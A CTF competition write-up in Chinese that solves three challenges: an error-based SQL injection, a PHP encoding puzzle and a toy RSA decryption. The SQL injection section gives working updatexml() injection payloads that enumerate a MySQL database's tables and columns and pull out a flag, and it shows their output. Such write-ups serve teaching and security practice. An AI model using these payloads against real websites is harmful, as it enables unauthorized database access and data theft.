天津攻防决赛wp
jerem1ah Lv4
  2022-11-07 14:43:23 2022-11-07 14:43   2024-05-18 21:57:17  

天津攻防决赛wp

Secondary_sqli:

image-20221107165730151

image-20221107165749197

image-20221107165811430

1
2
3
4
5
6
7
8
9
10
11

?name=12' and updatexml(1,(concat(0x7e,(database()))),1)%23&pass=1&cp=1
'''XPATH syntax error: '~users''''

?name=12' and updatexml(1,(concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where table_schema=database()))),1)%23&pass=1&cp=1
'''XPATH syntax error: '~flags,student,teacher,test''''

?name=12' and updatexml(1,(concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where table_name='flags'))),1)%23&pass=1&cp=1
'''flag'''

?name=12' and updatexml(1,(concat(0x7e,(select(right(group_concat(flag),30))from users.flags))),1)%23&pass=1&cp=1
1
2
3
flag{e4469e5d0e39b6377ba6caed38
69e5d0e39b6377ba6caed380db2e6}
flag{e4469e5d0e39b6377ba6caed380db2e6}

decode:

1
2
strrev()取逆函数
str_rot13()编码解码函数
1
2
3
4
5
6
7
8
9
10
function encode($str){
	$_o = strrev($str);
	for($_0=0;$_0<strlen($_o);$_0++){
		$_c = substr($_o,$_0,1);
		$__ = ord($_c)+1;
		$_c = chr($__);
		$_= $_.$_c;
	}
	return str_rot13(strrev(base64_encode($_)));
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
<?php
function encode($str){
//    $_o = strrev($str);
//    for($_0=0;$_0<strlen($_o);$_0++){
//        $_c = substr($_o,$_0,1);
//        $__ = ord($_c)+1;
//        $_c = chr($__);
//        $_= $_.$_c;
//    }
    return str_rot13('synt');
}
echo encode("flag");

//return str_rot13(strrev(base64_encode($_)));
function decode(){
    $str = "=pJovuTsWOUrtIJZtcKZ2OJMzEJZyMTLdIas";
    $str = base64_decode(strrev(str_rot13($str)));
    $t = "";
    for($i=0;$i<strlen($str);$i++){
        $a = substr($str,$i,1);
        $b = ord($a);
        $c = $b - 1;
        $t = $t.chr($c);
    }
    echo $t;
    echo strrev($t);
}

decode();
?>

image-20221107165828420

rsa

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66


import gmpy2
n = 920139713
e = 19
# for i in range(1,n):
#     if(int(n/i) == n/i):
#         print(i)

'''
p = 18443
q = 49891
'''
p = 18443
q = 49891
d = gmpy2.invert(e,(p-1)*(q-1))
print(d)
'''
d = 96849619
'''
d = 96849619

str = [
704796792,
752211152,
274704164,
18414022,
368270835,
483295235,
263072905,
459788476,
483295235,
459788476,
663551792,
475206804,
459788476,
428313374,
475206804,
459788476,
425392137,
704796792,
458265677,
341524652,
483295235,
534149509,
425392137,
428313374,
425392137,
341524652,
458265677,
263072905,
483295235,
828509797,
341524652,
425392137,
475206804,
428313374,
483295235,
475206804,
459788476,
306220148]

for i in str:
    x = gmpy2.powmod(i,d,n)
    print(chr(x),end='')

image-20221107165837092

 Comments
  1. Secondary_sqli:
  2. decode:
  3. rsa